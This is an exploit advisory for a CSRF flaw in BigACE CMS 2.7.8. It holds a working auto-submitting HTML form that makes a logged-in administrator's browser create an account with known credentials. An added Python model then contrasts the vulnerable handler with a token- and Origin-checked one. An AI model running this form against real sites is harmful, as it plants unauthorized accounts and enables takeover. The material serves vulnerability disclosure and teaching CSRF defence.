BigACE 2.7.8 - Cross-Site Request Forgery (Add Admin)

EDB-ID: 27276
CVE: none listed
Platform: PHP
Date: 2013-08-02


###########################################################################################
# Exploit Title: Bigace CMS CSRF - Adding an admin account
# Date: 29 July 2013
# Exploit Author: Yashar Shahinzadeh
# Credits: ha.cker.ir
# Vendor Homepage: http://www.bigace.de/
# Tested on: Linux & Windows, PHP 5.2.9
# Affected Version : 2.7.8
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir }
###########################################################################################

Summary:
========
1. CSRF - Adding an admin account
 

1. CSRF - Adding an admin account:
==================================

The admin user-creation handler (index.php?cmd=admin&id=userCreate_tADMIN_len&mode=create) accepts the POST below although it carries no anti-CSRF token. If an authenticated BigACE administrator opens a page containing this form, the browser submits it with the admin's session cookie and the CMS creates the user "yashar" (password "yashar") in group 40 with state 1.

<html>
<body onload="submitForm()">
<!-- Auto-submitting form: a logged-in BigACE admin who loads this page creates the user below. -->
<form name="myForm" id="myForm"
      action="[Path to Bigace CMS]/index.php?cmd=admin&id=userCreate_tADMIN_len&mode=create" method="post">
    <input type="hidden" name="userName" value="yashar">
    <input type="hidden" name="language" value="en">
    <input type="hidden" name="userGroups[]" value="40">   <!-- group id used by the advisory -->
    <input type="hidden" name="state" value="1">
    <input type="hidden" name="email" value="yashar@yashar.com">
    <input type="hidden" name="passwordnew" value="yashar">
    <input type="hidden" name="passwordcheck" value="yashar">
</form>
<script type="text/javascript">
// Called from body onload; submits the hidden form without user interaction.
function submitForm() { document.getElementById("myForm").submit(); }
</script>
</body>
</html>
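To show why the request above succeeds and what stops it, here is an added Python model of the user-creation endpoint, once as the advisory describes it and once behind a synchronizer token plus an Origin/Referer check. This is example code written for this page, not BigACE's own handler: the session dict, the `csrf_token` field name, the `SITE_ORIGIN` value and the attacker origin are assumptions, and the POST body is constructed from the fields of the PoC form.

```python
"""Model of the BigACE user-creation POST with and without CSRF protection.

Added example; not BigACE code. The request fields mirror the advisory's PoC;
the handler logic (session dict, token check, Origin check) is an assumed
minimal model of a synchronizer-token defence, not the project's actual code.
"""
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://cms.example"  # assumed location of the CMS

# The POST body from the advisory's auto-submitting form (constructed).
CSRF_POST = {
    "userName": "yashar",
    "language": "en",
    "userGroups[]": "40",
    "state": "1",
    "email": "yashar@yashar.com",
    "passwordnew": "yashar",
    "passwordcheck": "yashar",
}


def new_session():
    """Admin session as the CMS would hold it; the token is minted at login."""
    return {"user": "admin", "csrf_token": secrets.token_hex(32)}


def user_create_vulnerable(session, form, headers, users):
    """The behaviour the advisory exploits: any POST arriving with an
    authenticated session creates the account, wherever the form was hosted."""
    if session.get("user") != "admin":
        return "forbidden"
    if form.get("passwordnew") != form.get("passwordcheck"):
        return "password mismatch"
    users[form["userName"]] = {
        "groups": form.get("userGroups[]", "").split(","),
        "state": form.get("state"),
    }
    return "created"


def user_create_hardened(session, form, headers, users):
    """Same handler with two independent CSRF checks in front of it."""
    if session.get("user") != "admin":
        return "forbidden"
    # 1. Synchronizer token: the attacker's page cannot read the admin's
    #    session token, so it cannot put the right value into its form.
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted, session["csrf_token"]):
        return "rejected: bad csrf token"
    # 2. Origin/Referer check: browsers attach Origin to cross-site POSTs;
    #    a foreign value (or the literal "null") marks a cross-site submission.
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is not None:
        o = urlsplit(origin)
        if f"{o.scheme}://{o.netloc}" != SITE_ORIGIN:
            return "rejected: cross-site origin"
    return user_create_vulnerable(session, form, headers, users)


def run_scenario(handler):
    """Replay the advisory's cross-site POST, then a legitimate same-site one."""
    session = new_session()
    users = {}
    attacker_headers = {"Origin": "https://attacker.example"}  # assumed
    csrf_result = handler(session, dict(CSRF_POST), attacker_headers, users)
    legit_form = dict(CSRF_POST, userName="newadmin", csrf_token=session["csrf_token"])
    legit_headers = {"Origin": SITE_ORIGIN}
    legit_result = handler(session, legit_form, legit_headers, users)
    return csrf_result, legit_result, sorted(users)


if __name__ == "__main__":
    print("vulnerable:", run_scenario(user_create_vulnerable))
    print("hardened:  ", run_scenario(user_create_hardened))
```

The token check alone defeats the PoC; the Origin check is a second, independent layer that also catches a leaked or reused token. Marking the session cookie `SameSite=Lax` or `Strict` would stop the browser from attaching it to the cross-site POST in the first place, but that is a browser-side control and should not replace the server-side token.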